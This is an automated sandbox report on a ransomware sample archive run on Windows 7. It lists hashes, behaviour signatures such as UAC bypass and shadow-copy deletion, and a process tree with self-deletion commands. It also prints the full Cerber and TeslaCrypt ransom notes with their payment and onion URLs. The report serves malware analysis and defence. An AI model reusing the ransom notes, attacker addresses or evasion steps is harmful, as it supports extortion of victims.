Analysis

  • max time kernel
    208s
  • max time network
    209s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 21:58

General

  • Target

    RNSM00272.7z

  • Size

    5.2MB

  • MD5

    eadcd360fb1a1daf696f61968aa8f432

  • SHA1

    88af3355405ba550ee82b39041f5a81f63d74dda

  • SHA256

    20b37ae125dc868f05fe28dad7206435d99baaf499f10ffa361bb071eeba1c02

  • SHA512

    ae290cf8f0956f7693100f54154cf9b1291b18ea98ce6cd058c01b097e7d4ff3ffaaea85e40e3dcf7976145a05043e44644262a697f072351c38c311ab5d56b5

  • SSDEEP

    98304:TFEVgOf8S8rW7u8o1Oc/Q7Ia23NbZZxkzG7dmzZQKV+bjii6Uj5VOW2WDvWvQjq9:TFuf8VrEu8oLGGkzS2QKVSjsUB2MOIO9

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\_README_KSKUYX_.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>CERBER RANSOMWARE: Instructions</title> <HTA:APPLICATION APPLICATIONNAME="CERBER RANSOMWARE: Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 2.5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a href="#" id="change_language" onclick="return changeLanguage();" title="English">&#9745; English</a> <h1>CERBER RANSOMWARE</h1> <small id="title">Instructions</small> </div> <div id="languages"> <p>&#9745; Select your language</p> <ul> <li><a href="#" title="English" onclick="return showBlock('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li> <li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> <p>Can't you find the necessary files?<br>Is the content of your files not readable?</p> <p>It is normal because the files' names and the data in your files have been encrypted by "Cerber&nbsp;Ransomware".</p> <p>It means your files are NOT damaged! Your files are modified only. This modification is reversible.<br>From now it is not possible to use your files until they will be decrypted.</p> <p>The only way to decrypt your files safely is to buy the special decryption software "Cerber&nbsp;Decryptor".</p> <p>Any attempts to restore your files with the third-party software will be fatal for your files!</p> <hr> <p class="w331208">You can proceed with purchasing of the decryption software at your personal page:</p> <p><span class="info"><span class="updating">Please wait...</span><a id="megaurl" class="url" href="http://ffoqr3ug7m726zou.ac7zvz.top/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.ac7zvz.top/D2B4-C59D-7674-0091-B3AD</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.omc09c.top/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.omc09c.top/D2B4-C59D-7674-0091-B3AD</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.onion.to/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.onion.to/D2B4-C59D-7674-0091-B3AD</a></span></p> <p>If this page cannot be opened &nbsp;<span class="button" onclick="return updateUrl();">click here</span>&nbsp; to generate a new address to your personal page.</p> <p>At this page you will receive the complete instructions how to buy the decryption software for restoring all your files.</p> <p>Also at this page you will be able to restore any one file for free to be sure "Cerber&nbsp;Decryptor" will help you.</p> <hr> <p>If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor&nbsp;Browser:</p> <ol> <li>run your Internet browser (if you do not know what it is run the Internet&nbsp;Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor&nbsp;Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor&nbsp;Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address <br><span class="info">http://ffoqr3ug7m726zou.onion/D2B4-C59D-7674-0091-B3AD</span><br> in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> <p>If you have any problems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the search bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> <hr> <p><strong>Additional information:</strong></p> <p>You will find the instructions ("*.hta") for restoring your files in any folder with your encrypted files.</p> <p>The instructions ("*.hta") in the folders with your encrypted files are not viruses! The instructions ("*.hta") will help you to decrypt your files.</p> <p>Remember! The worst situation already happened and now the future of your files depends on your determination and speed of your actions.</p> </div> <div id="ar" style="direction: rtl;"> <p>لا يمكنك العثور على الملفات الضرورية؟<br>هل محتوى الملفات غير قابل للقراءة؟</p> <p>هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber&nbsp;Ransomware".</p> <p>وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا.<br>ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها.</p> <p>الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber&nbsp;Decryptor".</p> <p>إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك!</p> <hr> <p>يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية:</p> <p><span class="info"><span class="updating">أرجو الإنتظار...</span><a class="url" href="http://ffoqr3ug7m726zou.ac7zvz.top/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.ac7zvz.top/D2B4-C59D-7674-0091-B3AD</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.omc09c.top/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.omc09c.top/D2B4-C59D-7674-0091-B3AD</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.onion.to/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.onion.to/D2B4-C59D-7674-0091-B3AD</a></span></p> <p>في حالة تعذر فتح هذه الصفحة &nbsp;<span class="button" onclick="return updateUrl();">انقر هنا</span>&nbsp; لإنشاء عنوان جديد لصفحتك الشخصية.</p> <p>في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك.</p> <p>في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber&nbsp;Decryptor" سوف يساعدك.</p> <hr> <p>إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor:</p> <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان <br><span class="info">http://ffoqr3ug7m726zou.onion/D2B4-C59D-7674-0091-B3AD</span><br> في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> <p>إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه.</p> <hr> <p><strong>معلومات إضافية:</strong></p> <p>سوف تجد إرشادات استعادة الملفات الخاصة بك ("*.hta") في أي مجلد مع ملفاتك المشفرة.</p> <p>الإرشادات ("*.hta") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*.hta") سوف تساعدك على فك تشفير الملفات الخاصة بك.</p> <p>تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك.</p> </div> <div id="zh"> <p>您找不到所需的文件?<br>您文件的内容无法阅读?</p> <p>这是正常的,因为您文件的文件名和数据已经被“Cerber&nbsp;Ransomware”加密了。</p> <p>这意味着您的文件并没有损坏!您的文件只是被修改了,这个修改是可逆的,解密之前您无法使用您的文件。</p> <p>安全解密您文件的唯一方式是购买特别的解密软件“Cerber&nbsp;Decryptor”。</p> <p>任何使用第三方软件恢复您文件的方式对您的文件来说都将是致命的!</p> <hr> <p>您可以在您的个人页面上购买解密软件:</p> <p><span class="info"><span class="updating">请稍候...</span><a class="url" href="http://ffoqr3ug7m726zou.ac7zvz.top/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.ac7zvz.top/D2B4-C59D-7674-0091-B3AD</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.omc09c.top/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.omc09c.top/D2B4-C59D-7674-0091-B3AD</a><span class="hr"></span><a href="http://ffoqr3ug7m726zou.onion.to/D2B4-C59D-7674-0091-B3AD" target="_blank">http://ffoqr3ug7m726zou.onion.to/D2B4-C59D-7674-0091-B3AD</a></span></p> <p>如果这个页面无法打开,请 <span class="button" onclick="return updateUrl();">点击这里</span> 生成您个人页面的新地址。</p> <p>您将在这个页面上看到如何购买解密软件以恢复您的文件。</p> <p>您可以在这个页面使用“Cerber&nbsp;Decryptor”免费恢复任何文件。</p> <hr> <p>如果您的个人页面长期不可用,有其他方法可以打开您的个人页面 - 安装并使用 Tor 浏览器:</p> <ol> <li>使用您的上网浏览器(如果您不知道使用 Internet&nbsp;Explorer 的话);</li> <li>在浏览器的地址栏输入或复制地址 <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> 并按 ENTER 键;</li> <li>等待站点加载;</li> <li>您将在站点上下载 Tor 浏览器;下载并运行它,按照安装指南进行操作,等待直至安装完成;</li> <li>运行 Tor 浏览器;</li> <li>使用“Connect”按钮进行连接(如果您使用英文版);</li> <li>初始化之后将打开正常的上网浏览器窗口;</li> <li>在浏览器地址栏中输入或复制地址 <br><span class="info">http://ffoqr3ug7m726zou.onion/D2B4-C59D-7674-0091-B3AD</span><br></li> <li>按 ENTER 键;</li> <li>该站点将加载;如果由于某些原因等待一会儿后没有加载,请重试。</li> </ol> <p>如果在安装期间或使用 Tor 浏览器期间有任何问题,请访问 <a href="https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8" target="_blank">https://www.baidu.com</a> 并在搜索栏中输入“怎么安装 Tor 浏览器”,您将找到有关如何安装洋葱 Tor 浏览器的说明和教程。</p> <hr> <p><strong>附加信息:</strong></p> <p>您将在任何带有加密文件的文件夹中找到恢复您文件(“*.hta”)的说明。</p> <p>带有加密文件的文件夹中的(“*.hta”)说明不是病毒,(“*.hta”)说明将帮助您解密您的文件。</p> <p>请记住,最坏的情况都发生过了,您的文件还能不能用取决于您的决定和反应速度。</p> </div> <div id="nl"> <p>Kunt u de nodige files niet vinden?<br>Is de inhoud van uw bestanden niet leesbaar?</p> <p>Het is gewoonlijk omdat de bestandsnamen en de gegevens in uw bestanden zijn versleuteld door “Cerber&nbsp;Ransomware”.</p> <p>Het betekent dat uw bestanden NIET beschadigd zijn! Uw bestanden zijn alleen gewijzigd. Deze wijziging is omkeerbaar. Vanaf nu is het niet mogelijk uw bestanden te gebruiken totdat ze ontsleuteld zijn.</p> <p>De enige manier om uw bestanden veilig te

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://tt54rfdjhb34rfbnknaerg.milerteddy.com/3C7F6036C3BAB654 2. http://kkd47eh4hdjshb5t.angortra.at/3C7F6036C3BAB654 3. http://ytrest84y5i456hghadefdsd.pontogrot.com/3C7F6036C3BAB654 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/3C7F6036C3BAB654 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://tt54rfdjhb34rfbnknaerg.milerteddy.com/3C7F6036C3BAB654 http://kkd47eh4hdjshb5t.angortra.at/3C7F6036C3BAB654 http://ytrest84y5i456hghadefdsd.pontogrot.com/3C7F6036C3BAB654 *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/3C7F6036C3BAB654
URLs

http://tt54rfdjhb34rfbnknaerg.milerteddy.com/3C7F6036C3BAB654

http://kkd47eh4hdjshb5t.angortra.at/3C7F6036C3BAB654

http://ytrest84y5i456hghadefdsd.pontogrot.com/3C7F6036C3BAB654

http://xlowfznrg4wf7dli.ONION/3C7F6036C3BAB654

Signatures

  • Cerber

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

  • Cerber family
  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

  • Locky family
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modiloader family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • TeslaCrypt, AlphaCrypt

    Ransomware based on CryptoLocker. Shut down by the developers in 2016.

  • Teslacrypt family
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • UAC bypass 3 TTPs 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 9 IoCs
  • Renames multiple (387) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Contacts a large (755) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 33 IoCs
  • Loads dropped DLL 47 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • UPX packed file 22 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00272.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2120
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
      HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
      • C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe
        "C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe"
        3⤵
        • UAC bypass
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • System policy modification
        PID:2164
        • C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe
          "C:\Users\Admin\AppData\Roaming\Updatedlogs\Updatedlogs.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2220
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\EuUHY.txt"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2760
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\aTKJG.txt"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2648
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\zXyGPPyF.txt"
            5⤵
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:880
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\aEBdKflgy.txt"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" -f "C:\Users\Admin\AppData\Local\Temp\XeveW.txt"
            5⤵
            • Checks for any installed AV software in registry
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:772
    • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
      HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: MapViewOfSection
      PID:1936
      • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
        HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2864
    • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
      HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: MapViewOfSection
      PID:1856
      • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
        HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1644
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C del /Q /F "C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1724
    • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
      HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: MapViewOfSection
      PID:1260
      • C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
        HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2152
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys82F5.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2772
    • C:\Users\Admin\Desktop\00272\Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
      Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1940
      • C:\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe
        "C:\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe" /S
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:708
        • C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe
          C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe "C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\inetc.dll"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1980
        • C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe
          C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe "C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\inetc.dll" -1949
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2196
    • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
      Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1740
      • C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
        Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
        3⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2244
        • C:\Windows\mbhvrmroopgk.exe
          C:\Windows\mbhvrmroopgk.exe
          4⤵
          • Executes dropped EXE
